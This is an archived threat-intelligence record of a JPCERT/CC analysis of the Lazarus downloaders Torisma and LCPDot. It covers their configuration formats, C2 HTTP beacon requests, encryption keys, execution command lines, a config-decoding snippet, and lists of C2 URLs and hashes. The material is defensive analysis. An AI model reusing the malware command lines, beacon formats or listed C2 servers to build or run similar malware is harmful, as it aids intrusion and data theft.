{ "id": "73193574-ecc7-4882-9ff6-f7586bdbabe1", "created_at": "2026-04-06T00:13:20.698101Z", "updated_at": "2026-04-10T03:38:20.432472Z", "deleted_at": null, "sha1_hash": "e5ed1904b071cf600e4184600ea00146fc87fc2e", "title": "Operation Dream Job by Lazarus - JPCERT/CC Eyes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 596033, "plain_text": "Operation Dream Job by Lazarus - JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2021-01-25 · Archived: 2026-04-05 15:57:51 UTC\r\nLazarus (also known as Hidden Cobra) is known to use various kinds of malware in its attack operations, and we\r\nhave introduced some of them in our past articles. In this article, we present two more; Torisma and LCPDot.\r\nTorisma overview\r\nTorisma downloads and executes modules from external servers, and its infection spreads via malicious Word files\r\n[1]. Torisma samples that JPCERT/CC has analysed are DLL files and executed as an argument of rundll32.exe.\r\nBelow is an example of a command argument for Torisma execution.\r\n\"C:\\Windows\\System32\\rundll32.exe\" C:\\ProgramData\\USOShared\\usosqlite3.dat,sqlite3_create_functionex\r\nBy giving a key to decode internal data (mssqlite3_server_management) to export function\r\n(\"sqlite3_create_functionex\" in this example), the malware performs suspicious functions . Torisma's\r\nconfiguration, communication protocol and modules are described in the following sections.\r\nTorisma configuration\r\nTorisma loads C2 servers and other information from a separate file, which is located in the following directory:\r\n(Some samples do not load configuration files.)\r\n%LOCALAPPDATA%.IdentityService\\AccountStore.bak\r\nThe configuration file has a 12-byte signature (0x98 0x11 0x1A 0x45 0x90 0x78 0xBA 0xF9 0x4E 0xD6 0x8F\r\n0xEE) at the beginning. File contents will be loaded upon execution only if the signature matches the above value.\r\nFigure 1 is a sample of the configuration.\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 1 of 9\n\nFigure 1: Torisma configuration sample\r\nThe configuration file contains C2 server and other information. (See Appendix A for details.)\r\nTorisma communication with C2 servers\r\nBelow is an example of a HTTP POST request that Torisma sends at the beginning of the communication.\r\nPOST /[PATH] HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nConnection: Keep-Alive\r\nContent-Length: [Length]\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0\r\nHost: [Server]\r\nCache-Control: no-cache\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 2 of 9\n\nACTION=VIEW\u0026PAGE=[MAC Address]\u0026CODE=[random numeric]\u0026CACHE=[Base64 data]REQUEST=[random numeric]\r\n[Base64 data] contains a C2 server URL, MAC address and other information. (Please see Appendix B for the\r\ndetails of the data format.) If the following input is received as a response to the HTTP POST request, Torisma\r\nsends the second request.\r\nYour request has been accepted. ClientID: {f9102bc8a7d81ef01ba}\r\nThis is the second HTTP POST request.\r\nPOST /[PATH] HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nConnection: Keep-Alive\r\nContent-Length: [Length]\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0\r\nHost: [Server]\r\nCache-Control: no-cache\r\nACTION=PREVPAGE\u0026CODE=C[random numeric]\u0026RES=[random numeric]\r\nAs a response to this request, an encrypted and Base64-encoded module (\"+\" is replaced by a space ) is\r\ndownloaded. Torisma uses VEST-32 algorithm [2] for encryption. In the samples confirmed by JPCERT/CC, the\r\nencryption key was identical, which was \"ff7172d9c888b7a88a7d77372112d772\" (as in Figure 2). This encryption\r\nalgorithm is also used for encrypting C2 server information in the configuration.\r\nFigure 2: Torisma's VEST-32 encryption key\r\nTorisma modules\r\nTorisma performs various functions by downloading and executing additional modules. They are provided in the\r\nexecutable code format as in Figure 3, not PE format.\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 3 of 9\n\nFigure 3: Torisma module code sample\r\nJPCERT/CC has confirmed a couple of module functions actually used in attacks:\r\nSend information of infected hosts\r\nExecute specific files\r\nLCPDot overview\r\nLCPDot is also a downloader similar to Torisma. In some samples, the code was obfuscated by VMProtect. It is\r\nassumed that attacker used LCPDot for lateral movement on a victim's network infected with Torisma. Samples\r\nanalysed by JPCERT/CC perform suspicious behaviour with the following options added upon execution:\r\n-p: RC4 encryption key\r\n-s: Base64-encoded C2 server information\r\nBelow is an example of an execution command with a specific option.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c C:\\ProgramData\\Adobe\\Adobe.bin -p 0x53A4C60B\r\nThe following sections describe LCPDot configuration and communication protocol.\r\nLCPDot communication with C2 servers\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 4 of 9\n\nBelow is an example of a HTTP POST request that LCPDot sends at the beginning of the communication.\r\nPOST /[URL] HTTP/1.1\r\nAccept: text/html\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: SESSID=[Base64 data]\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: [Host]\r\nContent-Length: [Size]\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie=Enable\u0026CookieV=[random numeric]\u0026Cookie_Time=64\r\n[Base64 data] contains the encoded value of “[ID]-101010”. ([ID] is a unique value for the entire communication.\r\n) If the following input is received as a response to this request, LCPDot sends the second request.\r\nAuthentication Success\r\nThis is the second HTTP POST request.\r\nGET /[URL] HTTP/1.1\r\nAccept: text/html\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: SESSID=[Base64 data]\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: [Host]\r\nContent-Length: [Size]\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n[Base64 data] contains the encoded value of \"[ID]-101011\". As a response to this request, a RC4-encoded module\r\nis downloaded. The encryption key is the SHA1 hash value of the value specified either in the sample or in the\r\noption \"-p\" upon execution.\r\nThe function of the module is unknown as no module could be obtained during the analysis. It was at least\r\nconfirmed that it includes functions to disguise the data as a GIF image (Figure 4).\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 5 of 9\n\nFigure 4: Code to disguise data that LCPDot sends as GIF image\r\nLCPDot configuration\r\nLCPDot contains its configuration in itself. (In some samples, the configuration needs to be specified with the\r\noption \"-s\" when executed.) C2 server information is encoded with XOR+Base64. Below is an example of Python\r\nscript to decode the C2 server information.\r\ndecoed_base64_data = base64.b64decode(encode_data)\r\nfor i in decoed_base64_data:\r\n print chr(((ord(i) ^ 0x25) - 0x7a))\r\nLCPDot saves configuration data including C2 servers in a separate file. There are some patterns in the location of\r\nthe file, such as:\r\n%TEMP%¥..¥Thumbnails.db\r\n%TEMP%¥..¥ntuser.log1\r\nThe configuration data is RC4-encrypted. The encryption key is the SHA1 hash value of the value specified either\r\nin the sample or in option “-p” upon execution. Figure 5 is an example of decoded configuration.\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 6 of 9\n\nFigure 5: Example of decoded configuration\r\nIn closing\r\nThis article provided details of malware that Lazarus group uses during and after the intrusion. To date, this group\r\nhas used various kinds of malware besides the two covered in this article. We will provide an update when we find\r\nnew types of malware.\r\nC2 servers connected to the samples described in this article are listed in Appendix C. Please make sure that none\r\nof your devices is communicating with them.\r\nShusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] McAfee: Operation North Star: Behind The Scenes\r\nhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/\r\n[2] ECRYPT: VEST\r\nhttps://www.ecrypt.eu.org/stream/vest.html\r\nAppendix A: Torisma configuration\r\nTable A: List of configuration\r\nOffset Description Remarks\r\n0x000 Signature 0x98 0x11 0x1A 0x45 0x90 0x78 0xBA 0xF9 0x4E 0xD6 0x8F 0xEE\r\n0x00d Time\r\n0x011 -\r\n0x015 Drive check time\r\n0x01D Sleep time\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 7 of 9\n\n0x021 C2 server * 6 Size 0x202 (VEST-32 encrypted)\r\n0xC2D C2 server size * 6 Size 0x4\r\n0xC45 Disc drive flag Whether to count the number of disc drives\r\n0xC49 WTSActive flag Whether to count the number of logon users\r\n0xC4D ID\r\nAppendix B: Data sent by Torisma\r\nTable B: Format of data sent\r\nOffset Length Contents\r\n0x000 0x400 URL\r\n0x400 0x18 MAC address of infected host\r\n0x418 0xC Random string\r\n0x424 8 ID\r\n0x434 4 Numeric value\r\n0x438 4 \"2\"\r\nAppendix C: C2 servers\r\nhttps://www.commodore.com.tr/mobiquo/appExtt/notdefteri/writenote.php\r\nhttps://www.fabianiarte.com/newsletter/arte/view.asp\r\nhttps://www.scimpex.com/admin/assets/backup/requisition/requisition.php\r\nhttps://akramportal.org/public/voice/voice.php\r\nhttps://inovecommerce.com.br/public/pdf/view.php\r\nhttps://www.index-consulting.jp:443/eng/news/index.php\r\nhttp://kenpa.org/yokohama/main.php\r\nhttps://vega.mh-tec.jp:443/.well-known/index.php\r\nhttp://www.hirokawaunso.co.jp/wordpress/wp-includes/ID3/module.audio.mp4.php\r\nhttps://ja-fc.or.jp/shop/shopping.php\r\nhttps://www.leemble.com/5mai-lyon/public/webconf.php\r\nhttps://www.tronslog.com/public/appstore.php\r\nhttps://mail.clicktocareers.com/dev_clicktocareers/public/mailview.php\r\nAppendix D: Malware hash value\r\nTorisma\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 8 of 9\n\n9ae9ed06a69baa24e3a539d9ce32c437a6bdc136ce4367b1cb603e728f4279d5\r\nf77a9875dbf1a1807082117d69bdbdd14eaa112996962f613de4204db34faba7\r\n7762ba7ae989d47446da21cd04fd6fb92484dd07d078c7385ded459dedc726f9\r\nLCPDot\r\n0c69fd9be0cc9fadacff2c0bacf59dab6d935b02b5b8d2c9cb049e9545bb55ce\r\na9334efa9f40a36e7dde7ef1fe3018b2410cd9de80d98cf4e3bb5dd7c78f7fde\r\nba57f8fcb28b7d1085e2e5e24bf2a463f0fa4bbbeb3f634e5a122d0b8dbb53cc\r\nSource: https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html" ], "report_names": [ "Lazarus_malware2.html" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434400, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e5ed1904b071cf600e4184600ea00146fc87fc2e.pdf", "text": "https://archive.orkl.eu/e5ed1904b071cf600e4184600ea00146fc87fc2e.txt", "img": "https://archive.orkl.eu/e5ed1904b071cf600e4184600ea00146fc87fc2e.jpg" } }